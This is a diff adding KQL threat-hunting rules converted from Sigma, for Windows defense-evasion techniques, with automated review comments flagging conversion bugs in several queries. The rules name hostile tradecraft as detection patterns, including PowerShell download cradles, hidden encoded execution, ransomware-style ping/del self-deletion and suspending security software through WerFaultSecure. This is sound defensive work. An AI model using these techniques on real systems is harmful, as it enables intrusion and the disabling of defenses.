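Review bot: `RegistryKey endswith "\\Control\\Keyboard Layouts*"` on the last line carries a literal asterisk, a Sigma wildcard the backend did not translate, so that clause can never match a real key path and the rule is dead as written. The second half, `RegistryKey contains "Ime File"`, searches the key path for what is actually a value name; in DeviceRegistryEvents the value name lives in `RegistryValueName`. The intended predicate is `RegistryKey contains "\\Control\\Keyboard Layouts\\" and RegistryValueName =~ "Ime File"`. It is worth checking whether the backend leaves `*` in other `endswith`/`startswith` conversions, since the same silent failure would affect any rule using that Sigma modifier.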
@@ -0,0 +1,10 @@ +// Title: Suspicious Ping/Del Command Combination +// Author: Ilya Krestinichev +// Date: 2022-11-03 +// Level: high +// Description: Detects a method often used by ransomware. Which combines the "ping" to wait a couple of seconds and then "del" to delete the file in question. Its used to hide the file responsible for the initial infection for example +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.004 + +DeviceProcessEvents +| where (ProcessCommandLine contains "ping" and ProcessCommandLine contains "del ") and (ProcessCommandLine contains " -n " or ProcessCommandLine contains " /n " or ProcessCommandLine contains " –n " or ProcessCommandLine contains " —n " or ProcessCommandLine contains " ―n ") and (ProcessCommandLine contains " -f " or ProcessCommandLine contains " /f " or ProcessCommandLine contains " –f " or ProcessCommandLine contains " —f " or ProcessCommandLine contains " ―f " or ProcessCommandLine contains " -q " or ProcessCommandLine contains " /q " or ProcessCommandLine contains " –q " or ProcessCommandLine contains " —q " or ProcessCommandLine contains " ―q ") and ProcessCommandLine contains "Nul" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_powercfg_execution_to_change_lock_screen_timeout.kql b/KQL/rules/Defense Evasion/suspicious_powercfg_execution_to_change_lock_screen_timeout.kql new file mode 100644 index 00000000..510eb368 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_powercfg_execution_to_change_lock_screen_timeout.kql 
@@ -0,0 +1,10 @@
+// Title: Suspicious Powercfg Execution To Change Lock Screen Timeout
+// Author: frack113
+// Date: 2022-11-18
+// Level: medium
+// Description: Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\powercfg.exe" or ProcessVersionInfoOriginalFileName =~ "PowerCfg.exe") and ((ProcessCommandLine contains "/setacvalueindex " and ProcessCommandLine contains "SCHEME_CURRENT" and ProcessCommandLine contains "SUB_VIDEO" and ProcessCommandLine contains "VIDEOCONLOCK") or (ProcessCommandLine contains "-change " and ProcessCommandLine contains "-standby-timeout-"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_powershell_invocations_specific_processcreation.kql b/KQL/rules/Defense Evasion/suspicious_powershell_invocations_specific_processcreation.kql
new file mode 100644
index 00000000..17892898
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_powershell_invocations_specific_processcreation.kql
@@ -0,0 +1,10 @@ +// Title: Suspicious PowerShell Invocations - Specific - ProcessCreation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-05 +// Level: medium +// Description: Detects suspicious PowerShell invocation command parameters +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents +| where ((ProcessCommandLine contains "-nop" and ProcessCommandLine contains " -w " and ProcessCommandLine contains "hidden" and ProcessCommandLine contains " -c " and ProcessCommandLine contains "[Convert]::FromBase64String") or (ProcessCommandLine contains " -w " and ProcessCommandLine contains "hidden" and ProcessCommandLine contains "-ep" and ProcessCommandLine contains "bypass" and ProcessCommandLine contains "-Enc") or (ProcessCommandLine contains " -w " and ProcessCommandLine contains "hidden" and ProcessCommandLine contains "-noni" and ProcessCommandLine contains "-nop" and ProcessCommandLine contains " -c " and ProcessCommandLine contains "iex" and ProcessCommandLine contains "New-Object") or (ProcessCommandLine contains "iex" and ProcessCommandLine contains "New-Object" and ProcessCommandLine contains "Net.WebClient" and ProcessCommandLine contains ".Download") or (ProcessCommandLine contains "powershell" and ProcessCommandLine contains "reg" and ProcessCommandLine contains "add" and ProcessCommandLine contains "\\software\\") or (ProcessCommandLine contains "bypass" and ProcessCommandLine contains "-noprofile" and ProcessCommandLine contains "-windowstyle" and ProcessCommandLine contains "hidden" and ProcessCommandLine contains "new-object" and ProcessCommandLine contains "system.net.webclient" and ProcessCommandLine contains ".download")) and (not((ProcessCommandLine contains "(New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1" or ProcessCommandLine contains "Write-ChocolateyWarning"))) \ No newline at end of file 
diff --git a/KQL/rules/Defense Evasion/suspicious_process_masquerading_as_svchost_exe.kql b/KQL/rules/Defense Evasion/suspicious_process_masquerading_as_svchost_exe.kql
new file mode 100644
index 00000000..ce814bbd
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_process_masquerading_as_svchost_exe.kql
@@ -0,0 +1,14 @@
+// Title: Suspicious Process Masquerading As SvcHost.EXE
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2024-08-07
+// Level: high
+// Description: Detects a suspicious process that is masquerading as the legitimate "svchost.exe" by naming its binary "svchost.exe" and executing from an uncommon location.
+Adversaries often disguise their malicious binaries by naming them after legitimate system processes like "svchost.exe" to evade detection.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.005
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where FolderPath endswith "\\svchost.exe" and (not(((FolderPath in~ ("C:\\Windows\\System32\\svchost.exe", "C:\\Windows\\SysWOW64\\svchost.exe")) or ProcessVersionInfoOriginalFileName =~ "svchost.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_process_parents.kql b/KQL/rules/Defense Evasion/suspicious_process_parents.kql
new file mode 100644
index 00000000..1eca60d2
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_process_parents.kql
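Review bot: The exclusion `ProcessVersionInfoOriginalFileName =~ "svchost.exe"` on the last line suppresses the alert on the strength of PE version-resource metadata, which is set by whoever builds the binary, so a copy in an unusual path that carries that metadata is silently accepted and the `// - Unlikely` false-positive note overstates what the location check actually guarantees. Either drop that exclusion and rely on the two-path allow list alone, or keep it and record the limitation in the header, e.g. `// - Binaries whose version resource claims OriginalFileName svchost.exe are excluded; the check trusts that metadata.` Hard-coding `C:\` in the allow list also misses hosts whose system drive is not C:, which the description's "uncommon location" wording does not intend.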
@@ -0,0 +1,10 @@
+// Title: Suspicious Process Parents
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-03-21
+// Level: high
+// Description: Detects suspicious parent processes that should not have any children or should only have a single possible child program
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+
+DeviceProcessEvents
+| where (InitiatingProcessFolderPath endswith "\\minesweeper.exe" or InitiatingProcessFolderPath endswith "\\winver.exe" or InitiatingProcessFolderPath endswith "\\bitsadmin.exe") or ((InitiatingProcessFolderPath endswith "\\csrss.exe" or InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\eventvwr.exe" or InitiatingProcessFolderPath endswith "\\calc.exe" or InitiatingProcessFolderPath endswith "\\notepad.exe") and (not((isnull(FolderPath) or (FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\wermgr.exe" or FolderPath endswith "\\conhost.exe" or FolderPath endswith "\\mmc.exe" or FolderPath endswith "\\win32calc.exe" or FolderPath endswith "\\notepad.exe")))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_process_start_locations.kql b/KQL/rules/Defense Evasion/suspicious_process_start_locations.kql
new file mode 100644
index 00000000..22adc778
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_process_start_locations.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Process Start Locations
+// Author: juju4, Jonhnathan Ribeiro, oscd.community
+// Date: 2019-01-16
+// Level: medium
+// Description: Detects suspicious process run from unusual locations
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036, car.2013-05-002
+// False Positives:
+// - False positives depend on scripts and administrative tools used in the monitored environment
+
+DeviceProcessEvents
+| where (FolderPath contains ":\\RECYCLER\\" or FolderPath contains ":\\SystemVolumeInformation\\") or (FolderPath startswith "C:\\Windows\\Tasks\\" or FolderPath startswith "C:\\Windows\\debug\\" or FolderPath startswith "C:\\Windows\\fonts\\" or FolderPath startswith "C:\\Windows\\help\\" or FolderPath startswith "C:\\Windows\\drivers\\" or FolderPath startswith "C:\\Windows\\addins\\" or FolderPath startswith "C:\\Windows\\cursors\\" or FolderPath startswith "C:\\Windows\\system32\\tasks\\")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_process_suspension_via_werfaultsecure_through_edr_freeze.kql b/KQL/rules/Defense Evasion/suspicious_process_suspension_via_werfaultsecure_through_edr_freeze.kql
new file mode 100644
index 00000000..0007595c
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_process_suspension_via_werfaultsecure_through_edr_freeze.kql
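Review bot: The `startswith "C:\\Windows\\..."` clauses on the last line hard-code the system drive, while the first two clauses (`contains ":\\RECYCLER\\"`) are deliberately drive-agnostic, so a host with Windows on another drive is covered by half of the rule and not the other half. A single drive-agnostic predicate keeps the intent and is easier to extend: `FolderPath matches regex @'(?i)^[a-z]:\\windows\\(tasks|debug|fonts|help|drivers|addins|cursors|system32\\tasks)\\'` (the `(?i)` is needed because `matches regex` is case-sensitive, unlike `startswith`). The Sigma source presumably used `startswith` with a fixed drive, so this is a conversion choice the generator could make globally rather than a per-rule edit.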
@@ -0,0 +1,13 @@
+// Title: Suspicious Process Suspension via WERFaultSecure through EDR-Freeze
+// Author: Jason (https://github.com/0xbcf)
+// Date: 2025-09-23
+// Level: high
+// Description: Detects attempts to freeze a process likely an EDR or an antimalware service process through EDR-Freeze that abuses the WerFaultSecure.exe process to suspend security software.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Legitimate usage of WerFaultSecure for debugging purposes
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " /h " and ProcessCommandLine contains " /pid " and ProcessCommandLine contains " /tid " and ProcessCommandLine contains " /encfile " and ProcessCommandLine contains " /cancel " and ProcessCommandLine contains " /type " and ProcessCommandLine contains " 268310") and (FolderPath endswith "\\WerFaultSecure.exe" or ProcessVersionInfoOriginalFileName =~ "WerFaultSecure.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_procexp152_sys_file_created_in_tmp.kql b/KQL/rules/Defense Evasion/suspicious_procexp152_sys_file_created_in_tmp.kql
new file mode 100644
index 00000000..b0422cb6
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_procexp152_sys_file_created_in_tmp.kql
@@ -0,0 +1,14 @@
+// Title: Suspicious PROCEXP152.sys File Created In TMP
+// Author: xknow (@xknow_infosec), xorxes (@xor_xes)
+// Date: 2019-04-08
+// Level: medium
+// Description: Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder.
+This driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.t1562.001, attack.defense-evasion
+// False Positives:
+// - Other legimate tools using this driver and filename (like Sysinternals). Note - Clever attackers may easily bypass this detection by just renaming the driver filename. Therefore just Medium-level and don't rely on it.
+
+DeviceFileEvents
+| where (FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath endswith "PROCEXP152.sys") and (not((InitiatingProcessFolderPath contains "\\procexp64.exe" or InitiatingProcessFolderPath contains "\\procexp.exe" or InitiatingProcessFolderPath contains "\\procmon64.exe" or InitiatingProcessFolderPath contains "\\procmon.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_program_location_whitelisted_in_firewall_via_netsh_exe.kql b/KQL/rules/Defense Evasion/suspicious_program_location_whitelisted_in_firewall_via_netsh_exe.kql
new file mode 100644
index 00000000..44f055b4
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_program_location_whitelisted_in_firewall_via_netsh_exe.kql
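Review bot: The description continuation `+This driver is used by Sysinternals Process Explorer but also by KDU ...` is emitted as a bare line with no `//` prefix (the hunk's 14-line count confirms it is its own line), so the saved file is not valid KQL — Advanced Hunting rejects it at that line before the query runs. It needs to read `// This driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.` The same defect appears in every converted rule whose Sigma description spans several lines, so the converter should prefix each description line rather than only the first.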
@@ -0,0 +1,10 @@ +// Title: Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE +// Author: Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community +// Date: 2020-05-25 +// Level: high +// Description: Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.004 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "firewall" and ProcessCommandLine contains "add" and ProcessCommandLine contains "allowedprogram") or (ProcessCommandLine contains "advfirewall" and ProcessCommandLine contains "firewall" and ProcessCommandLine contains "add" and ProcessCommandLine contains "rule" and ProcessCommandLine contains "action=allow" and ProcessCommandLine contains "program=")) and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") and (ProcessCommandLine contains ":\\$Recycle.bin\\" or ProcessCommandLine contains ":\\RECYCLER.BIN\\" or ProcessCommandLine contains ":\\RECYCLERS.BIN\\" or ProcessCommandLine contains ":\\SystemVolumeInformation\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Default\\" or ProcessCommandLine contains ":\\Users\\Desktop\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\addins\\" or ProcessCommandLine contains ":\\Windows\\cursors\\" or ProcessCommandLine contains ":\\Windows\\debug\\" or ProcessCommandLine contains ":\\Windows\\drivers\\" or ProcessCommandLine contains ":\\Windows\\fonts\\" or ProcessCommandLine contains ":\\Windows\\help\\" or ProcessCommandLine contains ":\\Windows\\system32\\tasks\\" or ProcessCommandLine contains ":\\Windows\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Local Settings\\Temporary Internet Files\\" or ProcessCommandLine 
contains "\\Temporary Internet Files\\Content.Outlook\\" or ProcessCommandLine contains "%Public%\\" or ProcessCommandLine contains "%TEMP%" or ProcessCommandLine contains "%TMP%") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_provlaunch_exe_child_process.kql b/KQL/rules/Defense Evasion/suspicious_provlaunch_exe_child_process.kql new file mode 100644 index 00000000..e564fb1c --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_provlaunch_exe_child_process.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Provlaunch.EXE Child Process +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-08 +// Level: high +// Description: Detects suspicious child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceProcessEvents +| where ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains ":\\PerfLogs\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains "\\AppData\\Temp\\" or FolderPath contains "\\Windows\\System32\\Tasks\\" or FolderPath contains "\\Windows\\Tasks\\" or FolderPath contains "\\Windows\\Temp\\")) and InitiatingProcessFolderPath endswith "\\provlaunch.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_rasdial_activity.kql b/KQL/rules/Defense Evasion/suspicious_rasdial_activity.kql new file mode 100644 index 00000000..c2b341e2 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_rasdial_activity.kql 
@@ -0,0 +1,12 @@ +// Title: Suspicious RASdial Activity +// Author: juju4 +// Date: 2019-01-16 +// Level: medium +// Description: Detects suspicious process related to rasdial.exe +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1059 +// False Positives: +// - False positives depend on scripts and administrative tools used in the monitored environment + +DeviceProcessEvents +| where FolderPath endswith "rasdial.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_recursive_takeown.kql b/KQL/rules/Defense Evasion/suspicious_recursive_takeown.kql new file mode 100644 index 00000000..7a9488ad --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_recursive_takeown.kql @@ -0,0 +1,13 @@ +// Title: Suspicious Recursive Takeown +// Author: frack113 +// Date: 2022-01-30 +// Level: medium +// Description: Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1222.001 +// False Positives: +// - Scripts created by developers and admins +// - Administrative activity + +DeviceProcessEvents +| where (ProcessCommandLine contains "/f " and ProcessCommandLine contains "/r") and FolderPath endswith "\\takeown.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_regsvr32_execution_from_remote_share.kql b/KQL/rules/Defense Evasion/suspicious_regsvr32_execution_from_remote_share.kql new file mode 100644 index 00000000..06baeb9e --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_regsvr32_execution_from_remote_share.kql 
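Review bot: `FolderPath endswith "rasdial.exe"` omits the leading path separator that every neighbouring rule uses (compare `"\\takeown.exe"` in the next hunk), so any image whose name merely ends in those characters, e.g. `xrasdial.exe`, matches too; the intent is presumably the bare binary, so it should be `FolderPath endswith "\\rasdial.exe"`. With no command-line or parent constraint the rule also alerts on every launch of the tool, which the False Positives note should state plainly: `// - Any execution of rasdial.exe, including legitimate VPN/dial-up connections, matches this rule`.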
@@ -0,0 +1,10 @@
+// Title: Suspicious Regsvr32 Execution From Remote Share
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-31
+// Level: high
+// Description: Detects REGSVR32.exe to execute DLL hosted on remote shares
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.010
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " \\\\" and (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "\\REGSVR32.EXE")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_response_file_execution_via_odbcconf_exe.kql b/KQL/rules/Defense Evasion/suspicious_response_file_execution_via_odbcconf_exe.kql
new file mode 100644
index 00000000..32519eac
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_response_file_execution_via_odbcconf_exe.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Response File Execution Via Odbcconf.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-22
+// Level: high
+// Description: Detects execution of "odbcconf" with the "-f" flag in order to load a response file with a non-".rsp" extension.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.008
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " -f " or ProcessCommandLine contains " /f " or ProcessCommandLine contains " –f " or ProcessCommandLine contains " —f " or ProcessCommandLine contains " ―f ") and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe")) and (not((ProcessCommandLine contains ".rsp" or (ProcessCommandLine contains ".exe /E /F \"C:\\WINDOWS\\system32\\odbcconf.tmp\"" and FolderPath =~ "C:\\Windows\\System32\\odbcconf.exe" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\runonce.exe"))))
\ No newline at end of file
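Review bot: `ProcessVersionInfoOriginalFileName =~ "\\REGSVR32.EXE"` compares the PE OriginalFileName field against a value carrying a leading backslash; that field holds a bare file name, so this alternative can never be true and the rule silently relies on `FolderPath endswith` alone, which a renamed copy of regsvr32 evades. It should be `ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE"`, the form the odbcconf hunk on this same line already uses for `"odbcconf.exe"`. If the backslash was carried over from the upstream Sigma rule, it is worth fixing there as well so the next regeneration does not reintroduce it.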
diff --git a/KQL/rules/Defense Evasion/suspicious_rundll32_activity_invoking_sys_file.kql b/KQL/rules/Defense Evasion/suspicious_rundll32_activity_invoking_sys_file.kql new file mode 100644 index 00000000..aff33994 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_rundll32_activity_invoking_sys_file.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Rundll32 Activity Invoking Sys File +// Author: Florian Roth (Nextron Systems) +// Date: 2021-03-05 +// Level: high +// Description: Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452 +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011 + +DeviceProcessEvents +| where ProcessCommandLine contains "rundll32.exe" and (ProcessCommandLine contains ".sys," or ProcessCommandLine contains ".sys ") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_rundll32_execution_with_image_extension.kql b/KQL/rules/Defense Evasion/suspicious_rundll32_execution_with_image_extension.kql new file mode 100644 index 00000000..e45820a0 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_rundll32_execution_with_image_extension.kql 
@@ -0,0 +1,10 @@ +// Title: Suspicious Rundll32 Execution With Image Extension +// Author: Hieu Tran +// Date: 2023-03-13 +// Level: high +// Description: Detects the execution of Rundll32.exe with DLL files masquerading as image files +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011 + +DeviceProcessEvents +| where (ProcessCommandLine contains ".bmp" or ProcessCommandLine contains ".cr2" or ProcessCommandLine contains ".eps" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".ico" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".nef" or ProcessCommandLine contains ".orf" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".raw" or ProcessCommandLine contains ".sr2" or ProcessCommandLine contains ".tif" or ProcessCommandLine contains ".tiff") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_rundll32_setupapi_dll_activity.kql b/KQL/rules/Defense Evasion/suspicious_rundll32_setupapi_dll_activity.kql new file mode 100644 index 00000000..880bdc77 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_rundll32_setupapi_dll_activity.kql 
@@ -0,0 +1,12 @@ +// Title: Suspicious Rundll32 Setupapi.dll Activity +// Author: Konstantin Grishchenko, oscd.community +// Date: 2020-10-07 +// Level: medium +// Description: setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011 +// False Positives: +// - Scripts and administrative tools that use INF files for driver installation with setupapi.dll + +DeviceProcessEvents +| where FolderPath endswith "\\runonce.exe" and (InitiatingProcessCommandLine contains "setupapi.dll" and InitiatingProcessCommandLine contains "InstallHinfSection") and InitiatingProcessFolderPath endswith "\\rundll32.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_service_binary_directory.kql b/KQL/rules/Defense Evasion/suspicious_service_binary_directory.kql new file mode 100644 index 00000000..03b9b02d --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_service_binary_directory.kql 
@@ -0,0 +1,10 @@ +// Title: Suspicious Service Binary Directory +// Author: Florian Roth (Nextron Systems) +// Date: 2021-03-09 +// Level: high +// Description: Detects a service binary running in a suspicious directory +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1202 + +DeviceProcessEvents +| where (FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\$Recycle.bin" or FolderPath contains "\\Users\\All Users\\" or FolderPath contains "\\Users\\Default\\" or FolderPath contains "\\Users\\Contacts\\" or FolderPath contains "\\Users\\Searches\\" or FolderPath contains "C:\\Perflogs\\" or FolderPath contains "\\config\\systemprofile\\" or FolderPath contains "\\Windows\\Fonts\\" or FolderPath contains "\\Windows\\IME\\" or FolderPath contains "\\Windows\\addins\\") and (InitiatingProcessFolderPath endswith "\\services.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_service_installed.kql b/KQL/rules/Defense Evasion/suspicious_service_installed.kql new file mode 100644 index 00000000..439ddb56 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_service_installed.kql 
@@ -0,0 +1,14 @@
+// Title: Suspicious Service Installed
+// Author: xknow (@xknow_infosec), xorxes (@xor_xes)
+// Date: 2019-04-08
+// Level: medium
+// Description: Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders.
+Both services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.t1562.001, attack.defense-evasion
+// False Positives:
+// - Other legimate tools using this service names and drivers. Note - clever attackers may easily bypass this detection by just renaming the services. Therefore just Medium-level and don't rely on it.
+
+DeviceRegistryEvents
+| where (RegistryKey in~ ("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services\\NalDrv\\ImagePath", "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services\\PROCEXP152\\ImagePath")) and (not((RegistryValueData contains "\\WINDOWS\\system32\\Drivers\\PROCEXP152.SYS" and (InitiatingProcessFolderPath endswith "\\procexp64.exe" or InitiatingProcessFolderPath endswith "\\procexp.exe" or InitiatingProcessFolderPath endswith "\\procmon64.exe" or InitiatingProcessFolderPath endswith "\\procmon.exe" or InitiatingProcessFolderPath endswith "\\handle.exe" or InitiatingProcessFolderPath endswith "\\handle64.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_shellexec_rundll_call_via_ordinal.kql b/KQL/rules/Defense Evasion/suspicious_shellexec_rundll_call_via_ordinal.kql
new file mode 100644
index 00000000..d1ea84e1
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_shellexec_rundll_call_via_ordinal.kql
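Review bot: The `RegistryKey in~ (...)` list names `HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services\\NalDrv\\ImagePath`, and `CurrentControlSet001` is not a key that exists on Windows — the hive has `CurrentControlSet` (a link) and `ControlSetNNN`, never the two fused — so the exact match can never succeed and the rule is dead as generated; this looks like a mangled `CurrentControlSet` → `ControlSet001` rewrite in the backend pipeline. Defender for Endpoint also records the key path and the value name in separate columns, so even with the path corrected the `\\ImagePath` suffix belongs in `RegistryValueName`; something like `(RegistryKey endswith "\\Services\\NalDrv" or RegistryKey endswith "\\Services\\PROCEXP152") and RegistryValueName =~ "ImagePath"` should be confirmed against live data. Separately, the description continuation `+Both services are used in the tool ...` is a bare line without `//`, which makes the file a KQL syntax error until it is prefixed.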
@@ -0,0 +1,12 @@ +// Title: Suspicious ShellExec_RunDLL Call Via Ordinal +// Author: Swachchhanda Shrawan Poudel +// Date: 2024-12-01 +// Level: high +// Description: Detects suspicious call to the "ShellExec_RunDLL" exported function of SHELL32.DLL through the ordinal number to launch other commands. +Adversary might only use the ordinal number in order to bypass existing detection that alert on usage of ShellExec_RunDLL on CommandLine. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011 + +DeviceProcessEvents +| where (InitiatingProcessCommandLine contains "SHELL32.DLL" and (InitiatingProcessCommandLine contains "#568" or InitiatingProcessCommandLine contains "#570" or InitiatingProcessCommandLine contains "#572" or InitiatingProcessCommandLine contains "#576")) and ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msxsl.exe" or FolderPath endswith "\\odbcconf.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") or ((InitiatingProcessCommandLine contains "comspec" or InitiatingProcessCommandLine contains "iex" or InitiatingProcessCommandLine contains "Invoke-" or InitiatingProcessCommandLine contains "msiexec" or InitiatingProcessCommandLine contains "odbcconf" or InitiatingProcessCommandLine contains "regsvr32") or (InitiatingProcessCommandLine contains "\\Desktop\\" or InitiatingProcessCommandLine contains "\\ProgramData\\" or InitiatingProcessCommandLine contains "\\Temp\\" or InitiatingProcessCommandLine contains "\\Users\\Public\\"))) \ No newline at end of file 
